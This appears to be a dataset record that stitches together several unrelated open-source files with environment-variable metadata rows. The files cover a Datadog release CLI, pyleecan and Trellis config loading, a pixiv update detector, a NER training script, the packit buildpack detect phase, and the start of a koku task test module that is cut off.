abort('Repo `{}` is unsupported.'.format(repo))
if agent_version:
current_agent_version = agent_version
else:
echo_waiting('Finding the current minor release of the Agent... ', nl=False)
current_agent_version = get_current_agent_version()
echo_success(current_agent_version)
current_release_branch = '{}.x'.format(current_agent_version)
echo_info(
'Branch `{}` will be compared to `master`.'.format(current_release_branch)
)
echo_waiting('Getting diff... ', nl=False)
diif_command = 'git --no-pager log "--pretty=format:%H %s" {}..master'
with chdir(root):
result = run_command(diif_command.format(current_release_branch), capture=True)
if result.code:
origin_release_branch = 'origin/{}'.format(current_release_branch)
echo_failure('failed!')
echo_waiting(
'Local branch `{}` might not exist, trying `{}`... '.format(
current_release_branch, origin_release_branch
),
nl=False
)
result = run_command(diif_command.format(origin_release_branch), capture=True)
if result.code:
abort('Unable to get the diif.')
else:
echo_success('success!')
else:
echo_success('success!')
# [(commit_hash, commit_subject), ...]
diff_data = [
tuple(line.split(None, 1)) for line in reversed(result.stdout.splitlines())
]
num_changes = len(diff_data)
if dry_run:
for _, commit_subject in diff_data:
echo_info(commit_subject)
return
if repo == 'integrations-core':
options = OrderedDict((
('1', 'Integrations'),
('2', 'Containers'),
('s', 'Skip'),
('q', 'Quit'),
))
else:
options = OrderedDict((
('1', 'Agent'),
('2', 'Containers'),
('s', 'Skip'),
('q', 'Quit'),
))
default_option = get_next(options)
options_prompt = 'Choose an option (default {}): '.format(options[default_option])
options_text = '\n' + '\n'.join(
'{} - {}'.format(key, value) for key, value in iteritems(options)
)
commit_ids = set()
user_config = ctx.obj
trello = TrelloClient(user_config)
found_start_id = False
for i, (commit_hash, commit_subject) in enumerate(diff_data, 1):
commit_id = parse_pr_number(commit_subject)
if commit_id:
pr_data = get_pr(commit_id, user_config, repo=repo)
else:
try:
pr_data = get_pr_from_hash(commit_hash, repo, user_config).get('items', [{}])[0]
# Commit to master
except IndexError:
pr_data = {
'number': commit_hash,
'html_url': 'https://github.com/DataDog/{}/commit/{}'.format(repo, commit_hash),
}
commit_id = str(pr_data.get('number', ''))
if commit_id and commit_id in commit_ids:
echo_info('Already seen PR #{}, skipping it.'.format(commit_id))
continue
commit_ids.add(commit_id)
if start_id and not found_start_id:
if start_id == commit_id or start_id == commit_hash:
found_start_id = True
else:
echo_info(
'Looking for {}, skipping {}.'.format(
format_commit_id(start_id), format_commit_id(commit_id)
)
)
continue
pr_url = pr_data.get('html_url', 'https://github.com/DataDog/{}/pull/{}'.format(repo, commit_id))
pr_title = pr_data.get('title', commit_subject)
pr_author = pr_data.get('user', {}).get('login', '')
pr_body = pr_data.get('body', '')
finished = False
choice_error = ''
progress_status = '({} of {}) '.format(i, num_changes)
indent = ' ' * len(progress_status)
while not finished:
echo_success('\n{}{}'.format(progress_status, pr_title))
echo_success('Url: ', nl=False, indent=indent)
echo_info(pr_url)
echo_success('Author: ', nl=False, indent=indent)
echo_info(pr_author)
# Ensure Unix lines feeds just in case
echo_info(pr_body.strip('\r'), indent=indent)
echo_info(options_text)
if choice_error:
echo_warning(choice_error)
echo_waiting(options_prompt, nl=False)
# Terminals are odd and sometimes produce an erroneous null byte
choice = '\x00'
while choice == '\x00':
choice = click.getchar().strip()
try:
choice = ensure_unicode(choice)
except UnicodeDecodeError:
choice = repr(choice)
if not choice:
choice = default_option
if choice not in options:
echo_info(choice)
choice_error = u'`{}` is not a valid option.'.format(choice)
continue
else:
choice_error = ''
value = options[choice]
echo_info(value)
if value == 'Skip':
echo_info('Skipped {}'.format(format_commit_id(commit_id)))
break
elif value == 'Quit':
echo_warning('Exited at {}'.format(format_commit_id(commit_id)))
return
else:
creation_attempts = 3
for attempt in range(3):
rate_limited, error, response = trello.create_card(
value,
pr_title,
u'Pull request: {}\n\n{}'.format(pr_url, pr_body)
)
if rate_limited:
wait_time = 10
echo_warning(
'Attempt {} of {}: A rate limit in effect, retrying in {} '
'seconds...'.format(attempt + 1, creation_attempts, wait_time)
)
time.sleep(wait_time)
elif error:
if attempt + 1 == creation_attempts:
echo_failure('Error: {}'.format(error))
break
wait_time = 2
echo_warning(
'Attempt {} of {}: An error has occurred, retrying in {} '
'seconds...'.format(attempt + 1, creation_attempts, wait_time)
)
time.sleep(wait_time)
else:
echo_success('Created card: ', nl=False)
echo_info(response.json().get('url'))
break
finished = True
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help='Tag the git repo with the current release of a check'
)
@click.argument('check')
@click.argument('version', required=False)
@click.option('--push/--no-push', default=True)
@click.option('--dry-run', '-n', is_flag=True)
def tag(check, version, push, dry_run):
"""Tag the HEAD of the git repo with the current release number for a
specific check. The tag is pushed to origin by default.
Notice: specifying a different version than the one in __about__.py is
a maintenance task that should be run under very specific circumstances
(e.g. re-align an old release performed on the wrong commit).
"""
tagging_all = check == 'all'
valid_checks = get_valid_checks()
if not tagging_all and check not in valid_checks:
abort('Check `{}` is not an Agent-based Integration'.format(check))
if tagging_all:
if version:
abort('You cannot tag every check with the same version')
checks = sorted(valid_checks)
else:
checks = [check]
for check in checks:
echo_success('Check `{}`'.format(check))
# get the current version
if not version:
version = get_version_string(check)
# get the tag name
release_tag = get_release_tag_string(check, version)
echo_waiting('Tagging HEAD with {}'.format(release_tag))
if dry_run:
version = None
continue
result = git_tag(release_tag, push)
# For automation we may want to cause failures for extant tags
if result.code == 128 or 'already exists' in result.stderr:
echo_warning('Tag `{}` already exists, skipping...'.format(release_tag))
elif result.code != 0:
abort(code=result.code)
# Reset version
version = None
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help='Release a single check'
)
@click.argument('check')
@click.argument('version', required=False)
@click.pass_context
def make(ctx, check, version):
"""Perform a set of operations needed to release a single check:
\b
* update the version in __about__.py
* update the changelog
* update the requirements-agent-release.txt file
* commit the above changes
"""
valid_checks = get_valid_checks()
if check != 'all' and check not in valid_checks:
abort('Check `{}` is not an Agent-based Integration'.format(check))
# don't run the task on the master branch
if get_current_branch() == 'master':
abort('This task will commit, you do not want to add commits to master directly')
if check == 'all':
if version:
abort('You cannot bump every check to the same version')
checks = sorted(valid_checks)
else:
checks = [check]
for check in checks:
echo_success('Check `{}`'.format(check))
if version:
# sanity check on the version provided
cur_version = get_version_string(check)
p_version = parse_version_info(version)
p_current = parse_version_info(cur_version)
if p_version <= p_current:
abort('Current version is {}, cannot bump to {}'.format(cur_version, version))
else:
cur_version, changelog_types = ctx.invoke(changes, check=check, dry_run=True)
if not changelog_types:
echo_warning('No changes for {}, skipping...'.format(check))
continue
bump_function = get_bump_function(changelog_types)
version = bump_function(cur_version)
# update the version number
echo_info('Current version of check {}: {}, bumping to: {}'.format(check, cur_version, version))
update_version_module(check, cur_version, version)
# update the CHANGELOG
echo_waiting('Updating the changelog...')
# TODO: Avoid double GitHub API calls when bumping all checks at once
ctx.invoke(
changelog, check=check, version=version, old_version=cur_version, quiet=True, dry_run=False
)
if check == 'datadog_checks_dev':
commit_targets = [check]
# update the global requirements file
else:
commit_targets = [check, AGENT_REQ_FILE]
req_file = os.path.join(get_root(), AGENT_REQ_FILE)
echo_waiting('Updating the requirements file {}...'.format(req_file))
update_agent_requirements(req_file, check, get_agent_requirement_line(check, version))
# commit the changes.
# do not use [ci skip] so releases get built https://docs.gitlab.com/ee/ci/yaml/#skipping-jobs
msg = '[Release] Bumped {} version to {}'.format(check, version)
git_commit(commit_targets, msg)
# Reset version
version = None
# done
echo_success('All done, remember to push to origin and open a PR to merge these changes on master')
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help='Update the changelog for a check'
)
@click.argument('check')
@click.argument('version')
@click.argument('old_version', required=False)
@click.option('--quiet', '-q', is_flag=True)
@click.option('--dry-run', '-n', is_flag=True)
@click.pass_context
def changelog(ctx, check, version, old_version, quiet, dry_run):
"""Perform the operations needed to update the changelog.
This method is supposed to be used by other tasks and not directly.
"""
if check not in get_valid_checks():
abort('Check `{}` is not an Agent-based Integration'.format(check))
# sanity check on the version provided
cur_version = old_version or get_version_string(check)
if parse_version_info(version) <= parse_version_info(cur_version):
abort('Current version is {}, cannot bump to {}'.format(cur_version, version))
if not quiet:
echo_info('Current version of check {}: {}, bumping to: {}'.format(check, cur_version, version))
# get the name of the current release tag
target_tag = get_release_tag_string(check, cur_version)
# get the diff from HEAD
diff_lines = get_diff(check, target_tag)
# for each PR get the title, we'll use it to populate the changelog
pr_numbers = parse_pr_numbers(diff_lines)
if not quiet:
echo_info('Found {} PRs merged since tag: {}'.format(len(pr_numbers), target_tag))
user_config = ctx.obj
entries = []
for pr_num in pr_numbers:
try:
payload = get_pr(pr_num, user_config)
except Exception as e:
echo_failure('Unable to fetch info for PR #{}: {}'.format(pr_num, e))
continue
changelog_labels = get_changelog_types(payload)
if not changelog_labels:
abort('No valid changelog labels found attached to PR #{}, please add one!'.format(pr_num))
elif len(changelog_labels) > 1:
abort('Multiple changelog labels found attached to PR #{}, please only use one!'.format(pr_num))
changelog_type = changelog_labels[0]
if changelog_type == CHANGELOG_TYPE_NONE:
if not quiet:
# No changelog entry for this PR
echo_info('Skipping PR #{} from changelog due to label'.format(pr_num))
continue
author = payload.get('user', {}).get('login')
author_url = payload.get('user', {}).get('html_url')
title = '[{}] {}'.format(changelog_type, payload.get('title'))
entry = ChangelogEntry(
pr_num, title, payload.get('html_url'), author, author_url, from_contributor(payload)
)
entries.append(entry)
# store the new changelog in memory
new_entry = StringIO()
# the header contains version and date
header = '## {} / {}\n'.format(version, datetime.now().strftime('%Y-%m-%d'))
new_entry.write(header)
# one bullet point for each PR
new_entry.write('\n')
for entry in entries:
thanks_note = ''
if entry.from_contributor:
thanks_note = ' Thanks [{}]({}).'.format(entry.author, entry.author_url)
new_entry.write('* {}. See [#{}]({}).{}\n'.format(entry.title, entry.number, entry.url, thanks_note))
new_entry.write('\n')
# read the old contents
changelog_path = os.path.join(get_root(), check, 'CHANGELOG.md')
old = list(stream_file_lines(changelog_path))
# write the new changelog in memory
changelog_buffer = StringIO()
# preserve the title
changelog_buffer.write(''.join(old[:2]))
# prepend the new changelog to the old contents
# make the command idempotent
if header not in old:
changelog_buffer.write(new_entry.getvalue())
# append the rest of the old changelog
changelog_buffer.write(''.join(old[2:]))
# print on the standard out in case of a dry run
if dry_run:
echo_info(changelog_buffer.getvalue())
else:
# overwrite the old changelog
write_file(changelog_path, changelog_buffer.getvalue())
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help='Build and upload a check to PyPI'
)
@click.argument('check')
@click.option('--dry-run', '-n', is_flag=True)
@click.pass_context
def upload(ctx, check, dry_run):
"""Release a specific check to PyPI as it is on the repo HEAD."""
if check not in get_valid_checks():
abort('Check `{}` is not an Agent-based Integration'.format(check))
# retrieve credentials
pypi_config = ctx.obj.get('pypi', {})
username = pypi_config.get('user') or os.getenv('TWINE_USERNAME')
password = pypi_config.get('pass') or os.getenv('TWINE_PASSWORD')
if not (username and password):
abort('This requires pypi.user and pypi.pass configuration. Please see `ddev config -h`.')
auth_env_vars = {'TWINE_USERNAME': username, 'TWINE_PASSWORD': password}
echo_waiting('Building and publishing `{}` to PyPI...'.format(check))
check_dir = os.path.join(get_root(), check)
remove_path(os.path.join(check_dir, 'dist'))
with chdir(check_dir), EnvVars(auth_env_vars):
result = run_command('python setup.py bdist_wheel --universal', capture='out')
if result.code != 0:
abort(result.stdout, result.code)
echo_waiting('Build done, uploading the package...')
if not dry_run:
result = run_command('twine upload --skip-existing dist{}*'.format(os.path.sep))
if result.code != 0:
abort(code=result.code)
echo_success('Success!')
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help="Update the Agent's release and static dependency files"
)
@click.option('--no-deps', is_flag=True, help='Do not create the static dependency file')
@click.pass_context
def freeze(ctx, no_deps):
"""Write the `requirements-agent-release.txt` file at the root of the repo
listing all the Agent-based integrations pinned at the version they currently
have in HEAD. Also by default will create the Agent's static dependency file.
"""
echo_info('Freezing check releases')
checks = get_valid_checks()
checks.remove('datadog_checks_dev')
entries = []
for check in checks:
if check in AGENT_V5_ONLY:
echo_info('Check `{}` is only shipped with Agent 5, skipping'.format(check))
continue
try:
version = get_version_string(check)
entries.append('{}\n'.format(get_agent_requirement_line(check, version)))
except Exception as e:
echo_failure('Error generating line: {}'.format(e))
continue
lines = sorted(entries)
req_file = os.path.join(get_root(), AGENT_REQ_FILE)
write_file_lines(req_file, lines)
echo_success('Successfully wrote to `{}`!'.format(req_file))
if not no_deps:
ctx.invoke(dep_freeze)
| []
| []
| [
"TWINE_PASSWORD",
"TWINE_USERNAME"
]
| [] | ["TWINE_PASSWORD", "TWINE_USERNAME"] | python | 2 | 0 | |
pyleecan/__init__.py | # -*- coding: utf-8 -*-
from .loggers import init_default_log
import os
import platform
PACKAGE_NAME = "pyleecan"
# User folder (to store machine/materials/config)
if platform.system() == "Windows":
USER_DIR = os.path.join(os.environ["APPDATA"], PACKAGE_NAME)
USER_DIR = USER_DIR.replace("\\", "/")
else:
USER_DIR = os.environ["HOME"] + "/.local/share/" + PACKAGE_NAME
__version__ = "1.3.2"
init_default_log()
| []
| []
| [
"APPDATA",
"HOME"
]
| [] | ["APPDATA", "HOME"] | python | 2 | 0 | |
Server/pipeline/pixiv-scraper-old/update_detector/update_detector.py | import requests
from bs4 import BeautifulSoup
import googleapiclient.discovery
import traceback
import json
import os
URL_RANKING = "https://www.pixiv.net/ranking.php?mode=daily&content=illust"
API_URL = os.getenv("API_URL")
PROJECT = os.getenv("PROJECT")
ZONE = os.getenv("ZONE")
INSTANCE_NAME = os.getenv("INSTANCE_NAME")
def get_pipeline_timestamp():
res = requests.get(API_URL, timeout=90)
json_res = res.json()
timestamp = json_res['latest']
return timestamp
def get_pixiv_timestamp():
res = requests.get(URL_RANKING, timeout=90, headers={
"Accept-Language": "en-US"})
soup = BeautifulSoup(res.text, "html.parser")
page_title = soup.find('title').getText()
timestamp = page_title.split(" ")[-1].replace('/', '-')
return timestamp
def start_instance():
compute = googleapiclient.discovery.build(
'compute', 'v1', cache_discovery=False)
command = compute.instances().start(
project=PROJECT, zone=ZONE, instance=INSTANCE_NAME)
json_res = json.dumps(command.execute())
return(json_res)
def main(request):
try:
latest_timestamp = get_pipeline_timestamp()
pixiv_timestamp = get_pixiv_timestamp()
if pixiv_timestamp == latest_timestamp:
print("No update detected")
else:
print("Update detected")
start_instance()
return "Success"
except Exception as e:
print(e)
print(traceback.print_exc())
return str(e)
if __name__ == "__main__":
print(main("")) | []
| []
| [
"ZONE",
"PROJECT",
"API_URL",
"INSTANCE_NAME"
]
| [] | ["ZONE", "PROJECT", "API_URL", "INSTANCE_NAME"] | python | 4 | 0 | |
example/ner/few-shot/run.py | import os
import hydra
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]='1'
import logging
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "../")))
from hydra import utils
from torch.utils.data import DataLoader
from deepke.name_entity_re.few_shot.models.model import PromptBartModel, PromptGeneratorModel
from deepke.name_entity_re.few_shot.module.datasets import ConllNERProcessor, ConllNERDataset
from deepke.name_entity_re.few_shot.module.train import Trainer
from deepke.name_entity_re.few_shot.module.metrics import Seq2SeqSpanMetric
from deepke.name_entity_re.few_shot.utils.util import get_loss, set_seed
from deepke.name_entity_re.few_shot.module.mapping_type import mit_movie_mapping, mit_restaurant_mapping, atis_mapping
import warnings
warnings.filterwarnings("ignore", category=UserWarning)
from tensorboardX import SummaryWriter
writer = SummaryWriter(log_dir='logs')
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
DATASET_CLASS = {
'conll2003': ConllNERDataset,
'mit-movie': ConllNERDataset,
'mit-restaurant': ConllNERDataset,
'atis': ConllNERDataset
}
DATA_PROCESS = {
'conll2003': ConllNERProcessor,
'mit-movie': ConllNERProcessor,
'mit-restaurant': ConllNERProcessor,
'atis': ConllNERProcessor
}
DATA_PATH = {
'conll2003': {'train': 'data/conll2003/train.txt',
'dev': 'data/conll2003/dev.txt',
'test': 'data/conll2003/test.txt'},
'mit-movie': {'train': 'data/mit-movie/20-shot-train.txt',
'dev': 'data/mit-movie/test.txt'},
'mit-restaurant': {'train': 'data/mit-restaurant/10-shot-train.txt',
'dev': 'data/mit-restaurant/test.txt'},
'atis': {'train': 'data/atis/20-shot-train.txt',
'dev': 'data/atis/test.txt'}
}
MAPPING = {
'conll2003': {'loc': '<<location>>',
'per': '<<person>>',
'org': '<<organization>>',
'misc': '<<others>>'},
'mit-movie': mit_movie_mapping,
'mit-restaurant': mit_restaurant_mapping,
'atis': atis_mapping
}
@hydra.main(config_path="conf/config.yaml")
def main(cfg):
cwd = utils.get_original_cwd()
cfg.cwd = cwd
print(cfg)
data_path = DATA_PATH[cfg.dataset_name]
for mode, path in data_path.items():
data_path[mode] = os.path.join(cfg.cwd, path)
dataset_class, data_process = DATASET_CLASS[cfg.dataset_name], DATA_PROCESS[cfg.dataset_name]
mapping = MAPPING[cfg.dataset_name]
set_seed(cfg.seed) # set seed, default is 1
if cfg.save_path is not None: # make save_path dir
cfg.save_path = os.path.join(cfg.save_path, cfg.dataset_name+"_"+str(cfg.batch_size)+"_"+str(cfg.learning_rate)+cfg.notes)
if not os.path.exists(cfg.save_path):
os.makedirs(cfg.save_path, exist_ok=True)
process = data_process(data_path=data_path, mapping=mapping, bart_name=cfg.bart_name, learn_weights=cfg.learn_weights)
train_dataset = dataset_class(data_processor=process, mode='train')
train_dataloader = DataLoader(train_dataset, collate_fn=train_dataset.collate_fn, batch_size=cfg.batch_size, num_workers=4)
dev_dataset = dataset_class(data_processor=process, mode='dev')
dev_dataloader = DataLoader(dev_dataset, collate_fn=dev_dataset.collate_fn, batch_size=cfg.batch_size, num_workers=4)
label_ids = list(process.mapping2id.values())
prompt_model = PromptBartModel(tokenizer=process.tokenizer, label_ids=label_ids, args=cfg)
model = PromptGeneratorModel(prompt_model=prompt_model, bos_token_id=0,
eos_token_id=1,
max_length=cfg.tgt_max_len, max_len_a=cfg.src_seq_ratio,num_beams=cfg.num_beams, do_sample=False,
repetition_penalty=1, length_penalty=cfg.length_penalty, pad_token_id=1,
restricter=None)
metrics = Seq2SeqSpanMetric(eos_token_id=1, num_labels=len(label_ids), target_type='word')
loss = get_loss
trainer = Trainer(train_data=train_dataloader, dev_data=dev_dataloader, test_data=None, model=model, args=cfg, logger=logger, loss=loss,
metrics=metrics, writer=writer)
trainer.train()
writer.close()
if __name__ == "__main__":
main()
| []
| []
| [
"CUDA_DEVICE_ORDER",
"CUDA_VISIBLE_DEVICES"
]
| [] | ["CUDA_DEVICE_ORDER", "CUDA_VISIBLE_DEVICES"] | python | 2 | 0 | |
trellis/trellis.go | package trellis
import (
"errors"
"fmt"
"gopkg.in/ini.v1"
"gopkg.in/yaml.v2"
"io/ioutil"
"log"
"os"
"path/filepath"
"sort"
"strings"
)
const ConfigDir string = ".trellis"
type Trellis struct {
detector Detector
Environments map[string]*Config
ConfigPath string
Path string
Virtualenv *Virtualenv
}
func NewTrellis(d Detector) *Trellis {
return &Trellis{detector: d}
}
/*
Detect if a path is a Trellis project or not
This will traverse up the directory tree until it finds a valid project,
or stop at the root and give up.
*/
func (t *Trellis) Detect(path string) (projectPath string, ok bool) {
return t.detector.Detect(path)
}
func (t *Trellis) CreateConfigDir() error {
if err := os.Mkdir(t.ConfigPath, 0755); err != nil && !os.IsExist(err) {
return err
}
return nil
}
/*
Activates a Trellis project's virtualenv without loading the config files.
This is optimized to be a lighter weight version of LoadProject more suitable
for the shell hook.
*/
func (t *Trellis) ActivateProject() bool {
wd, err := os.Getwd()
if err != nil {
log.Fatal(err)
}
path, ok := t.Detect(wd)
if !ok {
return false
}
t.Path = path
t.ConfigPath = filepath.Join(path, ConfigDir)
t.Virtualenv = NewVirtualenv(t.ConfigPath)
if !t.Virtualenv.Initialized() {
return false
}
os.Chdir(t.Path)
return true
}
/*
Loads a Trellis project.
If a project is detected, the wordpress_sites config files are parsed and
the directory is changed to the project path.
*/
func (t *Trellis) LoadProject() error {
if t.Path != "" {
os.Chdir(t.Path)
return nil
}
wd, err := os.Getwd()
if err != nil {
log.Fatal(err)
}
path, ok := t.Detect(wd)
if !ok {
return errors.New("No Trellis project detected in the current directory or any of its parent directories.")
}
t.Path = path
t.ConfigPath = filepath.Join(path, ConfigDir)
t.Virtualenv = NewVirtualenv(t.ConfigPath)
os.Chdir(t.Path)
if os.Getenv("TRELLIS_VENV") != "false" {
if t.Virtualenv.Initialized() {
t.Virtualenv.Activate()
}
}
configPaths, _ := filepath.Glob("group_vars/*/wordpress_sites.yml")
envs := make([]string, len(configPaths))
t.Environments = make(map[string]*Config, len(configPaths)-1)
for i, p := range configPaths {
parts := strings.Split(p, string(os.PathSeparator))
envName := parts[1]
envs[i] = envName
t.Environments[envName] = t.ParseConfig(p)
}
return nil
}
func (t *Trellis) EnvironmentNames() []string {
var names []string
for key := range t.Environments {
names = append(names, key)
}
sort.Strings(names)
return names
}
func (t *Trellis) ValidateEnvironment(name string) (err error) {
_, ok := t.Environments[name]
if ok {
return nil
}
return fmt.Errorf("Error: %s is not a valid environment, valid options are %s", name, t.EnvironmentNames())
}
func (t *Trellis) SiteNamesFromEnvironment(environment string) []string {
var names []string
config := t.Environments[environment]
for name := range config.WordPressSites {
names = append(names, name)
}
sort.Strings(names)
return names
}
func (t *Trellis) FindSiteNameFromEnvironment(environment string, siteNameArg string) (string, error) {
if siteNameArg == "" {
return t.getDefaultSiteNameFromEnvironment(environment)
}
siteNames := t.SiteNamesFromEnvironment(environment)
for _, siteName := range siteNames {
if siteName == siteNameArg {
return siteName, nil
}
}
return "", fmt.Errorf("Error: %s is not a valid site. Valid options are %s", siteNameArg, siteNames)
}
func (t *Trellis) getDefaultSiteNameFromEnvironment(environment string) (siteName string, err error) {
sites := t.SiteNamesFromEnvironment(environment)
siteCount := len(sites)
switch {
case siteCount == 0:
return "", fmt.Errorf("Error: No sites found in %s", environment)
case siteCount > 1:
return "", fmt.Errorf("Error: Multiple sites found in %s. Please specific a site. Valid options are %s", environment, sites)
}
return sites[0], nil
}
func (t *Trellis) SiteFromEnvironmentAndName(environment string, name string) *Site {
return t.Environments[environment].WordPressSites[name]
}
func (t *Trellis) UpdateAnsibleConfig(section string, key string, value string) error {
ansibleCfg := filepath.Join(t.Path, "ansible.cfg")
cfg, err := ini.Load(ansibleCfg)
if err != nil {
return err
}
cfg.Section(section).Key(key).SetValue(value)
if err := cfg.SaveTo(ansibleCfg); err != nil {
return err
}
return nil
}
func (t *Trellis) WriteYamlFile(s interface{}, path string, header string) error {
data, err := yaml.Marshal(s)
if err != nil {
log.Fatal(err)
}
path = filepath.Join(t.Path, path)
data = append([]byte(header), data...)
if err := ioutil.WriteFile(path, data, 0666); err != nil {
log.Fatal(err)
}
return nil
}
| [
"\"TRELLIS_VENV\""
]
| []
| [
"TRELLIS_VENV"
]
| [] | ["TRELLIS_VENV"] | go | 1 | 0 | |
vendor/github.com/paketo-buildpacks/packit/detect.go | package packit
import (
"os"
"path/filepath"
"strings"
"github.com/BurntSushi/toml"
"github.com/paketo-buildpacks/packit/internal"
)
// DetectContext provides the contextual details that are made available by the
// buildpack lifecycle during the detect phase. This context is populated by
// the Detect function and passed to the DetectFunc during execution.
type DetectContext struct {
// WorkingDir is the location of the application source code as provided by
// the lifecycle.
WorkingDir string
// CNBPath is the absolute path location of the buildpack contents.
// This path is useful for finding the buildpack.toml or any other
// files included in the buildpack.
CNBPath string
// BuildpackInfo includes the details of the buildpack parsed from the
// buildpack.toml included in the buildpack contents.
BuildpackInfo BuildpackInfo
// Stack is the value of the chosen stack. This value is populated from the
// $CNB_STACK_ID environment variable.
Stack string
}
// DetectFunc is the definition of a callback that can be invoked when the
// Detect function is executed. Buildpack authors should implement a DetectFunc
// that performs the specific detect phase operations for a buildpack.
type DetectFunc func(DetectContext) (DetectResult, error)
// DetectResult allows buildpack authors to indicate the result of the detect
// phase for a given buildpack. This result, returned in a DetectFunc callback,
// will be parsed and persisted by the Detect function and returned to the
// lifecycle at the end of the detect phase execution.
type DetectResult struct {
// Plan is the set of Build Plan provisions and requirements that are
// detected during the detect phase of the lifecycle.
Plan BuildPlan
}
// BuildPlan is a representation of the Build Plan as specified in the
// specification:
// https://github.com/buildpacks/spec/blob/main/buildpack.md#build-plan-toml.
// The BuildPlan allows buildpacks to indicate what dependencies they provide
// or require.
type BuildPlan struct {
// Provides is a list of BuildPlanProvisions that are provided by this
// buildpack.
Provides []BuildPlanProvision `toml:"provides"`
// Requires is a list of BuildPlanRequirements that are required by this
// buildpack.
Requires []BuildPlanRequirement `toml:"requires"`
// Or is a list of additional BuildPlans that may be selected by the
// lifecycle
Or []BuildPlan `toml:"or,omitempty"`
}
// BuildPlanProvision is a representation of a dependency that can be provided
// by a buildpack.
type BuildPlanProvision struct {
// Name is the identifier whereby buildpacks can coordinate that a dependency
// is provided or required.
Name string `toml:"name"`
}
type BuildPlanRequirement struct {
// Name is the identifier whereby buildpacks can coordinate that a dependency
// is provided or required.
Name string `toml:"name"`
// Metadata is an unspecified field allowing buildpacks to communicate extra
// details about their requirement. Examples of this type of metadata might
// include details about what source was used to decide the version
// constraint for a requirement.
Metadata interface{} `toml:"metadata"`
}
// Detect is an implementation of the detect phase according to the Cloud
// Native Buildpacks specification. Calling this function with a DetectFunc
// will perform the detect phase process.
func Detect(f DetectFunc, options ...Option) {
config := OptionConfig{
exitHandler: internal.NewExitHandler(),
args: os.Args,
}
for _, option := range options {
config = option(config)
}
dir, err := os.Getwd()
if err != nil {
config.exitHandler.Error(err)
return
}
cnbPath, ok := os.LookupEnv("CNB_BUILDPACK_DIR")
if !ok {
cnbPath = filepath.Clean(strings.TrimSuffix(config.args[0], filepath.Join("bin", "detect")))
}
var buildpackInfo struct {
Buildpack BuildpackInfo `toml:"buildpack"`
}
_, err = toml.DecodeFile(filepath.Join(cnbPath, "buildpack.toml"), &buildpackInfo)
if err != nil {
config.exitHandler.Error(err)
return
}
result, err := f(DetectContext{
WorkingDir: dir,
CNBPath: cnbPath,
BuildpackInfo: buildpackInfo.Buildpack,
Stack: os.Getenv("CNB_STACK_ID"),
})
if err != nil {
config.exitHandler.Error(err)
return
}
file, err := os.OpenFile(config.args[2], os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0644)
if err != nil {
config.exitHandler.Error(err)
return
}
defer file.Close()
err = toml.NewEncoder(file).Encode(result.Plan)
if err != nil {
config.exitHandler.Error(err)
return
}
}
| [
"\"CNB_STACK_ID\""
]
| []
| [
"CNB_STACK_ID"
]
| [] | ["CNB_STACK_ID"] | go | 1 | 0 | |
koku/masu/test/processor/test_tasks.py | #
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Test the download task."""
import json
import logging
import os
import shutil
import tempfile
import time
from datetime import date
from datetime import timedelta
from decimal import Decimal
from unittest import skip
from unittest.mock import ANY
from unittest.mock import Mock
from unittest.mock import patch
from uuid import uuid4
import faker
from dateutil import relativedelta
from django.core.cache import caches
from django.db.models import Max
from django.db.models import Min
from django.db.utils import IntegrityError
from tenant_schemas.utils import schema_context
from api.iam.models import Tenant
from api.models import Provider
from api.utils import DateHelper
from koku.middleware import KokuTenantMiddleware
from masu.config import Config
from masu.database import AWS_CUR_TABLE_MAP
from masu.database import OCP_REPORT_TABLE_MAP
from masu.database.aws_report_db_accessor import AWSReportDBAccessor
from masu.database.ocp_report_db_accessor import OCPReportDBAccessor
from masu.database.provider_db_accessor import ProviderDBAccessor
from masu.database.report_manifest_db_accessor import ReportManifestDBAccessor
from masu.database.report_stats_db_accessor import ReportStatsDBAccessor
from masu.exceptions import MasuProcessingError
from masu.exceptions import MasuProviderError
from masu.external.downloader.report_downloader_base import ReportDownloaderWarning
from masu.external.report_downloader import ReportDownloaderError
from masu.processor._tasks.download import _get_report_files
from masu.processor._tasks.process import _process_report_file
from masu.processor.expired_data_remover import ExpiredDataRemover
from masu.processor.report_processor import ReportProcessorError
from masu.processor.report_summary_updater import ReportSummaryUpdaterCloudError
from masu.processor.report_summary_updater import ReportSummaryUpdaterProviderNotFoundError
from masu.processor.tasks import autovacuum_tune_schema
from masu.processor.tasks import get_report_files
from masu.processor.tasks import normalize_table_options
from masu.processor.tasks import record_all_manifest_files
from masu.processor.tasks import record_report_status
from masu.processor.tasks import refresh_materialized_views
from masu.processor.tasks import REFRESH_MATERIALIZED_VIEWS_QUEUE
from masu.processor.tasks import remove_expired_data
from masu.processor.tasks import remove_stale_tenants
from masu.processor.tasks import summarize_reports
from masu.processor.tasks import update_all_summary_tables
from masu.processor.tasks import update_cost_model_costs
from masu.processor.tasks import UPDATE_COST_MODEL_COSTS_QUEUE
from masu.processor.tasks import update_summary_tables
from masu.processor.tasks import vacuum_schema
from masu.processor.worker_cache import create_single_task_cache_key
from masu.test import MasuTestCase
from masu.test.database.helpers import ReportObjectCreator
from masu.test.external.downloader.aws import fake_arn
from reporting_common.models import CostUsageReportStatus
LOG = logging.getLogger(__name__)
class FakeDownloader(Mock):
"""Fake Downloader."""
def download_report(self):
"""Get reports for fake downloader."""
fake_file_list = [
"/var/tmp/masu/my-report-name/aws/my-report-file.csv",
"/var/tmp/masu/other-report-name/aws/other-report-file.csv",
]
return fake_file_list
class GetReportFileTests(MasuTestCase):
"""Test Cases for the celery task."""
fake = faker.Faker()
@patch("masu.processor._tasks.download.ReportDownloader", return_value=FakeDownloader)
def test_get_report(self, fake_downloader):
"""Test task."""
account = fake_arn(service="iam", generate_account_id=True)
report = _get_report_files(
Mock(),
customer_name=self.fake.word(),
authentication=account,
provider_type=Provider.PROVIDER_AWS,
report_month=DateHelper().today,
provider_uuid=self.aws_provider_uuid,
